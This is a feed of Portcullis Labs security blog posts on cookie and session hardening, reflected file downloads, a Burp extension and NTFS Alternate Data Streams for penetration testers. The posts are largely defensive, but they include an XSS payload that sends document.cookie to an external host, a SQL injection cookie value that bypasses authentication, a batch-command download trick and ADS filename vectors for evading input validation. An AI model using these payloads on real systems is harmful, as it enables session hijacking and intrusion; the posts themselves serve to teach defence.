Portcullis Labs (https://labs.portcullis.co.uk) — Research and Development

Keep your cookies safe (part 2)
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/
Thu, 15 Feb 2018 20:31:26 +0000

The post Keep your cookies safe (part 2) appeared first on Portcullis Labs.

In the first blog post we talked about the dangers to which your cookies are exposed. Now it is time to keep your cookies safe: time to learn what protection mechanisms exist, how to use them and why.

How to read this post?

The flowchart below will guide you through the process of checking whether your cookies are well protected. Note that there are more factors and cases that could potentially compromise your cookies (as discussed in part 1 of this blog post).

The explanation of the flowchart appears at the end of the post, so if anything is unclear, do not panic! Look for the question in the last part of the post, where it is explained.


A flowchart about how to get your cookies better secured.

Is your session cookie different before and after login?

  • Correct answer: Yes. If your unique session ID cookie is different before and after login, your session is correctly protected against session fixation attacks
  • Incorrect answer: No. If your unique session ID cookie stays the same and an attacker managed to steal your cookie before you logged into the web application, then once you are authenticated the attacker could also access the application

Recommendation: The session ID should be regenerated when the user logs in.
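
As a sketch of what this looks like server side, the snippet below uses a made-up in-memory session store in Python (it is not any particular framework's API; frameworks usually provide this out of the box, e.g. PHP's session_regenerate_id()). The point is only that the pre-login ID must stop working once the user authenticates:

```python
# Session-fixation protection sketch: discard the pre-login session ID
# and issue a fresh, unpredictable one at login time.
# The store and function names here are illustrative.
import secrets

sessions = {}  # session_id -> session data

def new_session():
    sid = secrets.token_hex(16)
    sessions[sid] = {"authenticated": False}
    return sid

def login(old_sid, username):
    data = sessions.pop(old_sid, {})   # invalidate the pre-login ID
    data.update({"authenticated": True, "user": username})
    new_sid = secrets.token_hex(16)    # issue a fresh ID post-authentication
    sessions[new_sid] = data
    return new_sid

anon = new_session()
auth = login(anon, "alice")
assert auth != anon and anon not in sessions
```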

Are you invalidating the session when the user logs out?

  • Correct answer: Yes. Once the user has logged out, the session must be destroyed or invalidated
  • Incorrect answer: No. If you do not destroy the session ID on the server side, the session will remain valid

Recommendation: Session must be invalidated after the user logs out.

Does your cookie have the attribute “HttpOnly”?

  • Correct answer: Yes. Your cookie is only accessible via HTTP and not via JavaScript
  • Incorrect answer: No. Your cookie is also accessible via JavaScript, so an attacker who compromises your application with Cross-site Scripting could access your cookie

Recommendation: Set the cookie as “HttpOnly”.
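
The flag is just an attribute on the Set-Cookie header. A minimal sketch with Python's standard http.cookies module (the cookie name and value are invented):

```python
# Emit an HttpOnly session cookie; the browser will then refuse to
# expose it through document.cookie.
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["sessionid"] = "d8a3ae94f81234321"
cookie["sessionid"]["httponly"] = True   # deny access from JavaScript

header = cookie["sessionid"].OutputString()
print(header)  # sessionid=d8a3ae94f81234321; HttpOnly
```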

Does your cookie have the full domain attribute set?

  • Correct answer: Yes. Your cookie is only sent to the exact domain where it is needed
  • Incorrect answer: No. Your cookie may also be sent to any sub-domains you host

Recommendation: The full domain of the cookie must be specified.

Does your cookie have an adequate lifetime?

  • Correct answer: Yes
  • Incorrect answer: No. Cookies with an excessive lifetime are not deleted when the user closes their browser and would therefore be exposed should an attacker manage to compromise the user’s system

Recommendation: Use cookies without a lifetime, so that they are deleted once the user closes their browser, or lower the lifetime to meet business requirements.
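
The difference is simply whether the Set-Cookie header carries an Expires/Max-Age attribute; without one, the cookie lives only as long as the browser session. A sketch (cookie names and values are invented):

```python
# Contrast a non-persistent "session" cookie (no lifetime, dies with the
# browser) against a persistent one with a bounded lifetime.
from http.cookies import SimpleCookie

c = SimpleCookie()
c["sid"] = "abc123"            # no expires/max-age: a session cookie
c["prefs"] = "lang=en"
c["prefs"]["max-age"] = 3600   # persisted, but only for one hour

assert "Max-Age" in c["prefs"].OutputString()
assert "Max-Age" not in c["sid"].OutputString()
```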

Do you have only one web application in the same domain?

What does this question mean? The following is an example of multiple web applications in the same domain:

  • www.mydomain.com/app1
  • www.mydomain.com/app2
  • www.mydomain.com/app3

There is not a correct answer to this question.

If you only have one application running over the same domain, you should not need to care about this issue. However, if you host multiple web applications, you need to set the “path” attribute of the cookie to ensure that the cookie is only sent to the web application it belongs to.
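
Using the example paths above, the scoping is a one-line attribute on the cookie (the cookie name and value here are made up):

```python
# Scope one cookie per application with the "path" attribute so the
# browser only sends it back for requests under that path.
from http.cookies import SimpleCookie

c = SimpleCookie()
c["app1_session"] = "token-for-app1"
c["app1_session"]["path"] = "/app1"    # only sent for /app1/* requests

print(c["app1_session"].OutputString())
# app1_session=token-for-app1; Path=/app1
```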

Are your cookies NOT storing sensitive information?

  • Correct answer: Yes. My cookies do not contain sensitive information
  • Incorrect answer: No. There is sensitive information in the cookies

Recommendation: Ensure that sensitive information is not stored in the cookies.

Does your web application support HTTPS?

If the answer to this question is NO, you are sending all the data through a plain text protocol. An attacker able to intercept network traffic between a user’s session and the web server could capture the sensitive data being transmitted.

If the answer is YES, there are some other questions you need to answer before you know whether you are protecting your cookies correctly:

Does your web application use HTTP + HTTPS (mixed content)?

If the answer is NO, it means that HTTP is not allowed and all the data is being sent over HTTPS. Although your cookie is secure in this case, you need to be careful if you enable HTTP.

If the answer is YES you need to answer one more question:

Is HSTS (HTTP Strict Transport Security) enabled, or does the cookie have the attribute “secure”?

If you have HSTS enabled, you are forcing all the data being sent over HTTPS (cookies included).

If the cookie has the attribute “secure”, you are forcing the cookie to be sent only over HTTPS.

Recommendation: Set the cookie as “secure” and consider enabling HSTS.
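
Both protections are plain response headers; a hedged sketch (the cookie value and the HSTS max-age are illustrative, pick a max-age that suits your rollout):

```python
# The "secure" flag keeps the cookie off plain HTTP; the HSTS header
# forces the browser onto HTTPS for every future request to the site.
from http.cookies import SimpleCookie

c = SimpleCookie()
c["sessionid"] = "d8a3ae94f81234321"
c["sessionid"]["secure"] = True        # never sent over plain HTTP
c["sessionid"]["httponly"] = True

response_headers = {
    "Set-Cookie": c["sessionid"].OutputString(),
    # Tell browsers to use HTTPS for the next year, sub-domains included
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}
```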

Web Application Whitepaper
https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/
Wed, 06 Sep 2017 11:12:46 +0000

The post Web Application Whitepaper appeared first on Portcullis Labs.

This document aims to analyse and explore data collected from technical assurance engagements during 2016.

The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP; however, due to time constraints, our data points were not submitted. As a result, the co-authors (Simone and Isa) chose to compare the EMEAR team’s statistics from 2016 against the now public 2017 Top 10 published by OWASP. Additionally, they also took a look at the most common web application issues reported by the team during the last year and analysed their impact and severity.

WAW
WAW.pdf
September 6, 2017
Version: 1.0
925.6 KiB
MD5 hash: 0986d3ab7f6f55c71199296189ce5f62
Details

Keep your cookies safe (part 1)
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/
Fri, 22 Apr 2016 15:03:32 +0000

The post Keep your cookies safe (part 1) appeared first on Portcullis Labs.

What are cookies and why are they important?

A cookie is a small piece of data sent from a web site and stored in a user’s web browser, and is subsequently included with all authenticated requests that belong to that session. Some cookies contain the user’s session data in a web site, which is vital. Other cookies are used for keeping long-term records of an individual’s browsing history and preferences, such as their preferred language. Sometimes they are also used for tracking and monitoring a user’s activities across different web sites.

Because HTTP is a stateless protocol, the web site needs a way to authenticate the user on each request. Every time the user visits a new page within a web site, the browser sends the user’s cookie back to the server, allowing the server to serve the correct data to that individual user, who is tracked using a session ID. Cookies therefore play an integral part in ensuring persistence of data across the multiple HTTP requests made throughout the time a user visits a web site.

What does a cookie look like?

Set-Cookie: __cfduid=d8a3ae94f81234321; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.domain.com; HttpOnly

The cookie above is an example of a common cookie generated for WordPress. Here we break down each part of the cookie and explain what it is used for:

  • Set-Cookie – the web server asks the browser to save the cookie with this command
  • __cfduid=d8a3ae94f81234321; – this is the cookie itself. To the left of the equals symbol is the name of the cookie and to the right is its value
  • expires=Mon, 23-Dec-2019 23:50:00 GMT; – this is the date and time when the cookie will expire
  • path=/; domain=.domain.com; – the cookie domain and path define the scope of the cookie. They tell the browser that cookies should only be sent back to the server for the given domain and path
  • HttpOnly – this attribute (without a value associated) tells the browser that JavaScript cannot be used to access the cookie, which must only be accessed through HTTP or HTTPS. Sometimes you will also see the attribute “Secure”, which prevents the cookie being sent over the unencrypted HTTP protocol (i.e. the cookie will only be transmitted over HTTPS)
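
The breakdown above can be reproduced with a standard cookie parser; for instance (a Python illustration, not part of the original post's workflow):

```python
# Parse the example Set-Cookie value and pull out the parts described
# in the list above.
from http.cookies import SimpleCookie

raw = ("__cfduid=d8a3ae94f81234321; expires=Mon, 23-Dec-2019 23:50:00 GMT; "
       "path=/; domain=.domain.com; HttpOnly")
jar = SimpleCookie()
jar.load(raw)

morsel = jar["__cfduid"]
print(morsel.value)        # d8a3ae94f81234321
print(morsel["domain"])    # .domain.com
print(morsel["expires"])   # Mon, 23-Dec-2019 23:50:00 GMT
```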

What is the impact of having your cookies compromised?

A traditional and important role of a cookie is to store a user’s session ID, which is used to identify the user. If this type of cookie is stolen by a malicious user, they would be able to gain access to the web site as the user to whom the cookie belonged (i.e. the malicious user would have access to your account within the web site).

In the case of the tracking cookie, the malicious user would have access to your browsing history for the web site.

Another problem arises when sensitive data is stored in cookies, for example a username. This is also a vector for server-side exploitation if the cookie’s contents are not properly validated, which can potentially lead to serious vulnerabilities such as SQL injection or remote code execution.

What are the main cookie threats?


Cookie Monster.

There are different attack vectors by which cookies can be obtained and modified, leading to the hijacking of an authenticated user’s session, or even SQL injection attacks against the server. These threats may arise when an attacker takes control of the web browser using Cross-site Scripting or spyware in order to obtain a user’s session ID cookie, which can then be used by the attacker to impersonate the legitimate user, as shown in the following example:

Obtaining access to the cookie can be as easy as using the following JavaScript line:

document.cookie

Imagine that the web site has a search form that is vulnerable to Cross-site Scripting (Reflective Cross-site Scripting in this case).


http://myweb.com/form.php?search=XSS_PAYLOAD_HERE

An attacker could use the following payload to send the cookie to an external web site:

<script>location.href='http://external_website.com/cookiemonster.php?c00kie='+escape(document.cookie);</script>

The final step would be to send the vulnerable link to an admin and wait for them to click on it. If the attacker uses a URL shortener, this allows for further obfuscation of the malicious URL, as the admin will be unable to see the content of the link they have been sent.

An attacker able to read a given user’s files may also attempt to retrieve the cookies stored in files on the system. Furthermore, some browsers store persistent cookies in a binary file that is easily readable with existing public tools.

Security weaknesses may also reside on the server side when cookies are modified, if input validation routines are not adequately implemented. The example below shows how to bypass the authentication process:

//In /core/user.php: (cs cart vulnerability)

if (fn_get_cookie(AREA_NAME . '_user_id')) {
 $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status, membership_id FROM $db_tables[users]
 WHERE user_id='".fn_get_cookies(AREA_NAME . '_user_id')."' AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
 fn_define('LOGGED_VIA_COOKIE', true);

}

//Cookie: cs_cookies[customer_user_id]=1'/*;
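
The root cause above is string concatenation of raw cookie values into SQL. For contrast, here is a parameterised version of a similar lookup, sketched in Python with sqlite3 and a made-up users table (this is not cs-cart's actual code):

```python
# With placeholders, attacker-controlled cookie values are passed as
# data, never spliced into the SQL text, so the quote payload is inert.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_id TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('1', 'hash')")

def lookup(user_id, password):
    row = conn.execute(
        "SELECT user_id FROM users WHERE user_id = ? AND password = ?",
        (user_id, password)).fetchone()
    return row

assert lookup("1", "hash") == ("1",)
assert lookup("1'/*", "x") is None    # the injection payload does nothing
```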

Given the role they play, cookies are really important and may be targeted in many different attacks.

Now that you are more aware of the dangers, it would be wise to ensure steps are taken to deploy web site cookies safely and securely. Look out for the second part of this post!

Burp Extension
https://labs.portcullis.co.uk/blog/burp-extension/
Wed, 26 Aug 2015 12:09:36 +0000

The post Burp Extension appeared first on Portcullis Labs.

At Portcullis, one of the more frequent assessments we perform is the web application assessment. One of the main challenges we face during these assessments is looking for information that can either help escalate our privileges or allow us to gain access to different functionalities of the web application. Unauthorised access to functionality can often be considered an issue in itself; however, testing for this can also lead to information about the type of web server an application is running on, the underlying host and its version.

To check whether an application is out of date, or whether there are any known vulnerabilities associated with a given version, we must first obtain the server and version information. This can often prove time consuming and can be subject to human error. To improve effectiveness and reduce the occurrence of human error, we developed a Burp Suite extension that checks whether the server discloses any information within the response headers and automatically adds the issue to an issues list.

In addition to checking for disclosed information, the extension will also make a request to the web server’s main page for the latest version and compare this against the application in question to confirm whether it is the most up-to-date available. The most common web servers, and some others, are already bundled with the extension. However, the extension also provides a configuration tab in which the headers that are checked for information disclosure can be modified, removed or added. This also applies to the software, URLs and regular expressions used to look up the latest versions.
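
At its core, the header check runs a set of product/version regexes over response header values. A rough sketch of the idea in Python (the patterns and header values here are examples, not the extension's bundled list or its Java source):

```python
# Scan response headers for product/version disclosures using a
# per-product regex table.
import re

VERSION_PATTERNS = {
    "Apache": re.compile(r"Apache/([\d.]+)"),
    "nginx": re.compile(r"nginx/([\d.]+)"),
}

def disclosed_versions(headers):
    findings = []
    for value in headers.values():
        for product, pattern in VERSION_PATTERNS.items():
            m = pattern.search(value)
            if m:
                findings.append((product, m.group(1)))
    return findings

print(disclosed_versions({"Server": "Apache/2.4.7 (Ubuntu)"}))
# [('Apache', '2.4.7')]
```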

[Image: BurpExtension]

In the above image, you will see that there are two other pieces of functionality bundled with the extension. The first, following the same line of enquiry as the previous check (inspecting the server’s response headers), is that the extension is also able to check for missing security headers. As before, whilst most of the common security headers are already bundled with the extension, it is possible to add more or alternative headers to be checked for. Additionally, there is an option to add an informational issue if any of the security headers are found.
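
The missing-header check can be sketched in the same spirit; the header list below is a typical baseline, not necessarily the exact set the extension ships with:

```python
# Report which of a baseline set of security headers are absent from a
# response (header name comparison is case-insensitive).
EXPECTED = [
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Content-Security-Policy",
    "Strict-Transport-Security",
]

def missing_headers(response_headers):
    present = {h.lower() for h in response_headers}
    return [h for h in EXPECTED if h.lower() not in present]

print(missing_headers({"X-Frame-Options": "DENY"}))
# ['X-Content-Type-Options', 'Content-Security-Policy', 'Strict-Transport-Security']
```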

The second piece of functionality is a default Burp state restorer. Following good practice, a new assessment should start with a clean Burp state. To improve efficiency, instead of repeatedly loading the same state file, you can use the extension to load a state file from any chosen path. This will save you at least four clicks, and you won’t forget to configure anything when starting Burp.

Finally, the last piece of functionality provided by the extension is a new tab on the request and response editor window that parses a JSON object and prints it with indentation, making it easier to read. This will prove useful when dealing with web services or AJAX requests with JSON responses.

It should be noted that when reporting the information disclosure and missing header issues, only one issue is reported per host. In cases where different findings appear in later responses, further issues will be added with the new findings.

The source code of the application can be found at : https://github.com/eonlight/BurpExtenderHeaderChecks

This blog post was written by Ruben

You can’t even trust your own reflection these days…
https://labs.portcullis.co.uk/blog/you-cant-even-trust-your-own-reflection-these-days/
Wed, 05 Nov 2014 17:37:34 +0000

The post You can’t even trust your own reflection these days… appeared first on Portcullis Labs.

Recently, researchers at Trustwave’s SpiderLabs spoke at Black Hat Europe on the dangers of simply reflecting data back to the requesting user as part of an HTTP request/response exchange. When you think about it, this stands to reason, after all, it’s what Cross-site Scripting attacks are born from. What’s interesting is that the new research discussed another way in which it could be exploited.

The basic premise of the attack (as described in SpiderLabs’ Reflected File Download whitepaper) is as follows:

  1. The user follows a malicious link to a trusted web site
  2. An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was hosted on the trusted web site
  3. The user executes the file which contains shell commands that gain complete control over the computer

So how does it work? On a recent engagement, one of our consultants found a similar issue. In their case, it was a stored variant of the issue SpiderLabs describe, but in other regards it was identical. The consultant discovered that the application they were testing used two APIs that allowed for the storage and retrieval of data, like so:

POST /putData HTTP/1.0
...
{"id":12345, "input":"asdf||calc.exe||pause"}

This data could then be retrieved using the following URL:

  • http://URL/getData/12345;1.bat

Requesting this in a browser results in the browser believing that the user has downloaded what appears to be a batch file called 12345;1.bat. If the user executes this file, then calc.exe (part of our original input) will be executed.

As with other similar attacks, which exploit variances in how user controlled data is treated by different components of a solution (in this case, the browser and the server), once you know what to watch out for, it’s fairly easy to mitigate.

Specifically:

  • Validate all user input
  • Sanitise by means of context sensitive encoding/escaping any user input that remains
  • Avoid wildcard mappings such as /getdata/* on exposed web services
  • Ensure that you’re correctly setting the important HTTP headers such as Content-Type and Content-Disposition (and other related headers such as X-Content-Type-Options) so that direct requests for the URL cause the file to be downloaded

This last point is particularly important: browsers will often attempt to automatically render downloaded content using whatever application is registered for the target file type. Sending a Content-Disposition header of:

attachment; filename=1.txt

precludes this, as no matter whether it is saved or opened, it will be treated as text, a relatively safe file type.
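
Putting the header advice together, a response for a user-influenced download might be built like this (a Python sketch; the function name and values are illustrative, not from the engagement described above):

```python
# Build the response headers for a download so that the browser treats
# the body as an inert text attachment with a server-chosen filename.
def safe_download_headers(filename="1.txt"):
    return {
        "Content-Type": "text/plain; charset=utf-8",
        # A fixed attachment filename stops the browser trusting the URL path
        "Content-Disposition": 'attachment; filename="%s"' % filename,
        # Stop browsers second-guessing (sniffing) the declared content type
        "X-Content-Type-Options": "nosniff",
    }

print(safe_download_headers()["Content-Disposition"])
# attachment; filename="1.txt"
```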

All in all, a nice catch and one we’ll definitely use in our red team engagements.

EMF Camp 2014 talk
https://labs.portcullis.co.uk/blog/emf-camp-2014-talk/
Thu, 28 Aug 2014 17:15:14 +0000

The post EMF Camp 2014 talk appeared first on Portcullis Labs.

We recently announced our sponsorship of EMF Camp 2014; we’re ready to go, Portcullis flags in tow, and will be heading on over to Milton Keynes to help get EMF ready.

While there, we will not only be sponsoring the Lounge, where people can come and enjoy a space to relax and drink beer, and setting up the Portcullis Village, where people can visit us and exchange ideas, but members of Portcullis will also be hosting talks throughout the weekend.

How Many Bugs Can A Time Server Have? Friday 29th @ 14:00, Stage B

Portcullis members Tim Brown and Mike Emery will be talking about a number of new advisories to be released by Portcullis during the event, including a remote root in a network device. The attack surface will be broken down, with the bugs in each area exposed. The impact of the findings as a whole will then be discussed, with the consequences potentially reaching far beyond the compromised device itself!

Minimal Effort Web Application Security (a.k.a. how to make my job harder) Sunday 31st @ 12:00 Stage C

Portcullis member Graham Sutherland will be presenting his quick tips on making your web applications more resistant to common attack vectors, without putting a lot of effort in. Graham says “In some cases, simply adding a line to a configuration file can completely prevent entire classes of attack from being viable”. Graham will take a look at hardening against XSS, SQL injection, clickjacking, password cracking, and a few other bits if there’s time. “With any luck, you’ll make my job a lot harder!”

For those spoilt for choice, both talks will be featured in our EMF blog post after the event.

NTFS Alternate Data Streams for pentesters (part 1)
https://labs.portcullis.co.uk/blog/ntfs-alternate-data-streams-for-pentesters-part-1/
Thu, 27 Feb 2014 11:23:17 +0000

The post NTFS Alternate Data Streams for pentesters (part 1) appeared first on Portcullis Labs.

Alternate Data Streams (ADS) have been present in modern versions of Windows for a long time. If you are using an NTFS filesystem, you can bet that you are using them. As penetration testers, we can use this OS-specific feature to our advantage. The following posts will provide the information required to understand and identify potential ADS-related issues. This post provides the background needed to understand some common scenarios that could be useful during penetration testing engagements.

What are Alternate Data Streams?

Alternate Data Streams are a feature of NTFS (New Technology File System), the Windows-proprietary filesystem. With NTFS, all files contain at least one stream, but it is possible to associate alternate streams or contents with a file. When you open a file, you are accessing the main stream of the file, but using a specific syntax you can access an alternate stream. ADS are also known as NTFS streams.

If it helps you to understand this concept, think of an NTFS file as a container with multiple compartments. The container is the file name, and each of the compartments is a stream. Unless stated otherwise, when accessing the container you open the default compartment, which is the standard behaviour when you open a file on Windows.

Why should I care about ADS?

As penetration testers, using ADS could allow us to bypass the expected behaviour of applications. Take into account that NTFS streams are fully integrated into Windows, which also implies that most of the web components built on top of it (e.g. PHP/Java) support them, even if the developers are not aware of that.

Therefore, using the ADS format could help us during our penetration testing activities, as the input validation controls might not be expecting a filename using the NTFS stream format.

Moreover, over the years multiple vulnerabilities have been identified in different products. For example, IIS has had a couple of vulnerabilities relating to ADS (see CVE-1999-0278 and CVE-2010-2731); what makes things interesting is that these vulnerabilities were reported over 10 years apart. In short, this feature has been abused by attackers and security researchers across a period of more than 10 years.

Which are the internal details of ADS?

It seems that NTFS streams were added by Microsoft in order to support the Macintosh Hierarchical File System, and the ReFS and Universal Disk Format (UDF) file systems also support this feature.

You should note that NTFS streams will be lost if you copy files to a file system that doesn’t support them (e.g. FAT). If you need more details, feel free to read the Microsoft documentation here.

As you will see below, NTFS streams are also present on directories, which are a special case. However, as far as I know, the main limitation is that custom streams cannot be created within directories, so we are limited to reading or deleting directories using the default system stream name.

Basically, the syntax required to access a NTFS stream is the following:

<name>:<stream_name>:<stream_type>
  • name refers to the resource; it can be a file (e.g. document.txt) or a folder (e.g. Windows)
  • stream_name is the name of our compartment; when working with files, an empty stream name indicates the default stream, while for folders the default stream name is “$I30”
  • stream_type will always be $DATA when dealing with files, or $INDEX_ALLOCATION for folders

When the stream_name is omitted, you are accessing the main stream. For example, the following NTFS streams are equivalent:

  • myfile.txt
  • myfile.txt:
  • myfile.txt::$DATA

In the case of directories, the following NTFS streams are equivalent:

  • mydir
  • mydir:$I30:$INDEX_ALLOCATION
  • mydir::$INDEX_ALLOCATION

How to create ADS

echo "test" > myfile:stream
mkdir "myfolder:$I30:$INDEX_ALLOCATION"

How to read ADS

more < myfile:stream
more < myfile:stream:$DATA
dir C:\Windows:$I30:$INDEX_ALLOCATION

How can I enumerate NTFS data streams on Windows?

Powershell

get-item -Path d:\* -Stream *

Vista and above

dir /r

Sysinternals

streams -s c:

Which ADS should I focus on while doing a penetration test?

In short, focus should be put on the following elements:

Files

The following NTFS streams might help us to bypass the input validation routines when writing/reading files:

  • myfile.txt::$DATA (Contains the data stored on myfile.txt)
  • myfile.txt:stream:$DATA (Contains the data stored on the ADS called “stream”, which is located on myfile.txt)

Directory

The following attack vectors might allow us to enumerate folders on the remote server or, depending on the implemented input validation routines, perform more dangerous attacks:

  • directory::$DATA
  • directory:$I30:$INDEX_ALLOCATION
  • directory::$INDEX_ALLOCATION
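
To see why these vectors matter, consider a hypothetical server-side extension blacklist that a stream-suffixed filename slips past. The sketch below is pure string logic in Python (the check and helper are invented for illustration, and the simple colon-split normaliser assumes bare filenames, not full Windows paths):

```python
# A naive blacklist rejects names ending in a script extension, but
# "shell.asp::$DATA" does not end in ".asp" even though, on NTFS, its
# data would land in shell.asp's main stream.
BLOCKED = (".asp", ".aspx", ".php")

def naive_blocked(filename):
    return filename.lower().endswith(BLOCKED)

def strip_ads(filename):
    # Reduce "name:stream_name:stream_type" to "name" before validating
    return filename.split(":", 1)[0]

assert naive_blocked("shell.asp")
assert not naive_blocked("shell.asp::$DATA")          # the bypass
assert naive_blocked(strip_ads("shell.asp::$DATA"))   # normalised first
```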

Summary

This post explained what NTFS streams are, providing the necessary background to understand attacks using this NTFS feature. In the next post we’ll see some examples of potential vulnerabilities that we might expect to see in real-life applications.

Improving the security in web sessions (part 2)
https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/
Fri, 24 Jan 2014 00:02:38 +0000

The post Improving the security in web sessions (part 2) appeared first on Portcullis Labs.

The previous post about session management discussed how to improve the security of web sessions. An aspect not addressed in that post is how to identify that a session is no longer in active use even though the user has not manually logged out; for example, a user who was using a banking application and closed the tab without logging out of the application.

This point is also crucial for web applications because computers and web browsers are frequently shared between people, so it is important that this case cannot be exploited. Identifying when the user stops working with a web application, and terminating the session, reduces the window of opportunity that surrounds this type of attack.

Although web applications should always include a “Log out” button, it is naive to think that all users are going to close their sessions when they finish using a web application, or before closing the tab or web browser where it was loaded.

Using JavaScript events

JavaScript allows you to handle an event which is fired at the moment a browser window or a browser tab is closed. The name of this event is onbeforeunload. In fact, this event is fired before a page is unloaded, which includes: closing the tab, reloading the page, using the browser’s navigation buttons, clicking on a link…

How the web browser acts when this event is fired is implementation-specific. In general, the event can be used to display a message box asking the user whether they want to leave the current page. This message box contains two buttons to allow the user to choose between completing the action (closing the tab) or staying on the page.

So, in principle, it could be possible to detect when the user is closing the page and then send a request to the server with their confirmation. The fact is, however, that the majority of web browsers do not return control to the JavaScript interpreter before closing the tab, so it is not possible to send the request only in those cases where the user decides that they actually want to close the tab (the event can always send a request before asking the user, but few browsers will be able to do it after confirmation).

Testing showed that Firefox returns control to the JavaScript interpreter but, depending on the version, this only works when the page is reloaded, not when a tab or the browser is closed (tested with versions 23 and 24). Similarly, Opera version 17 will send the logout request when the browser is closed, but not if the user closes the tab. The rest of the tested browsers (Safari, IE and Chrome) did not send anything if the user confirmed the tab/browser closing.

The following code is an example of how to implement it:

<html>
<head>
<script src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
<script>
// Not using jQuery
/*
window.onbeforeunload = function () {
    return "Are you sure you want to LOGOUT the session?";
};

// Used to log out the session when the browser window is closed
window.onunload = function () {
    $.get( "http://127.0.0.1/logout" );
};
*/

// Using jQuery
$(window).on('beforeunload', function() {
        return 'Are you sure you want to LOGOUT the session?';
});

$(window).unload(function() {
        $.get( "http://127.0.0.1/logout" );
});
</script>
</head>
<body>
  <h1><i>Unload</i> and <i>Beforeunload</i> example</h1>
  Please reload, close this tab or close the browser to launch the test.
</body>
</html>

So, as you can see, this is not a suitable solution to the original problem outlined at the start of this post.

Using AJAX ping

A better approach, because it should work in any web browser, is to reduce the session timeout on the server to a few minutes (2-5 minutes) and to ping the server regularly (every 15-30 seconds) with an AJAX request. The ping requests keep the session alive on the web server, preventing it from being timed out unintentionally. On the other hand, if the user closes the tab or the browser, the session will be terminated by the web server after the configured period.

The code below is a possible implementation of an AJAX ping using jQuery:

$(function() { window.setInterval(function() { $.post('http://example.com/keepAlive'); }, 15000); });

This line should be included in every page of the application, so it would be a good idea to place it in a file and include that file in the contents of every page served by the web server.

With this solution, there are two problems:

  • The server will need to be able to support the load of the ping requests which, depending on the number of users, could be thousands each minute. However, an application with that many users should already be able to support such a load, so this is not a real problem.
  • If the user leaves the application open in a browser without supervision, the session will never time out.

The way to fix the second problem is to count the number of pings the server receives without any other kind of request and to configure the application to close the session after the corresponding period (the idle time). This limit will need to be longer than the session timeout, to cover users who are using the application but staying on the same page for a while. For example:

Imagine that the session timeout is configured to 2 minutes and the delay between pings to 15 seconds. That means that after closing the browser, the session will remain live for 2 minutes at most before being closed. That is a suitable period for the web server to wait before timing the session out because it tolerates network or connectivity problems which could in principle cause some of the pings to be lost (8 ping requests would have to be lost for the session to be closed by mistake).
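To make the ping bookkeeping concrete, here is a minimal sketch of the counting logic (all names are mine, not from any particular framework), using the figures from the example above: pings every 15 seconds and a 2 minute idle limit:

```javascript
// Sketch of server-side idle detection (names hypothetical).
// pingIntervalMs and idleLimitMs match the example figures above.
function createIdleTracker(pingIntervalMs, idleLimitMs) {
    let consecutivePings = 0;
    return {
        // Called when a keep-alive ping arrives.
        onPing: function () {
            consecutivePings += 1;
        },
        // Called when any real (non-ping) request arrives.
        onRequest: function () {
            consecutivePings = 0;
        },
        // True once pings alone have covered the idle limit.
        isIdle: function () {
            return consecutivePings * pingIntervalMs >= idleLimitMs;
        }
    };
}
```

The server would call onPing() for each keep-alive request and onRequest() for everything else; once isIdle() returns true, the session can be terminated.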

The major problem is the idle time, which will have to be configured depending on the kind of application. If the web application contains long articles, the idle time should be set to a longer period (5-10 minutes). If the application consists of small pages, then the idle time could be configured to the same as the session timeout (but never shorter).

By doing this, the application covers the following cases:

  • If the tab or web browser is closed, the session will be terminated after the session timeout (2 minutes in the example).
  • If the user leaves the application unattended, the session will be closed after the idle time (at least as long as the session timeout but no more than 10 minutes).
  • While the user is working with the application, the session will remain active.

A last improvement would be to use a variable timeout: it could be set to the same period as the session timeout in most cases but increased for those pages which take longer to read.

Editor’s note: If you enjoyed our two articles on how to improve session management, we’ve asked the author to put together a good practice guide detailing these and other practical steps that can be employed to help keep your users safe.

The post Improving the security in web sessions (part 2) appeared first on Portcullis Labs.

Improving the security in web sessions (part 1) https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/ https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions/#comments Thu, 09 Jan 2014 14:14:18 +0000 https://labs.portcullis.co.uk/?p=2012

The post Improving the security in web sessions (part 1) appeared first on Portcullis Labs.

Session management is a crucial part of web applications and therefore it is also the target of numerous kinds of attacks. Critical web applications, such as banking applications, require complete control of the users’ sessions to prevent abuses or session hijacking attacks.

One way to complicate these types of attack is for the web application to have complete control of the user’s session. Typically, web applications use a session token, normally in the form of a cookie, to identify sessions, but they do not normally check anything else to verify the legitimacy of the session. So, if an attacker can somehow retrieve the token used by an authenticated user, the attacker can usually steal the victim’s session by sending the retrieved token within each request.

However, if the web application tightly controls the state of the user inside the application, it becomes very difficult for an attacker to steal a session while the user is still interacting with it. Let me explain it with an example:

Imagine an application whose flow can be represented with the following diagram:

[Figure: flow diagram of the example application]

In the initial state, users are not logged into the application and, until they do so, they stay in that state. After logging in to the application, they get access to the private area, where there are 3 different pages. From any of those pages, the user can finish their session by going to the logout page. Inside the private area, users can only browse the pages in the order: 1 -> 2 -> 3 -> 1 -> 2 … Any other interaction which is not represented by an arrow in the diagram is not allowed (for example, going from 2 to 1).

In this context, each session could be represented by the usual session token plus the state the user is in. With this in place, if an attacker was able to retrieve the token in order to gain access to the application, they would request a state which would most likely not correspond to any of the valid next states.

For example, if the legitimate user is in the state “Private Page 1” at the moment of the attack, the only 2 possible next states are “Private Page 2” and “Log out”. An attacker would need to know this, and if they did not, the application could detect the attack and invalidate the session. It is true that the state can be discovered by exploiting other vulnerabilities, such as a Cross-site Scripting flaw in the application, but if so, the application will record that the new user state is, for example, “Private Page 2”. Therefore, when the legitimate user tries to get access to the next state (remember that they were actually in the “Private Page 1” state), the application will detect the irregularity and will terminate the session.

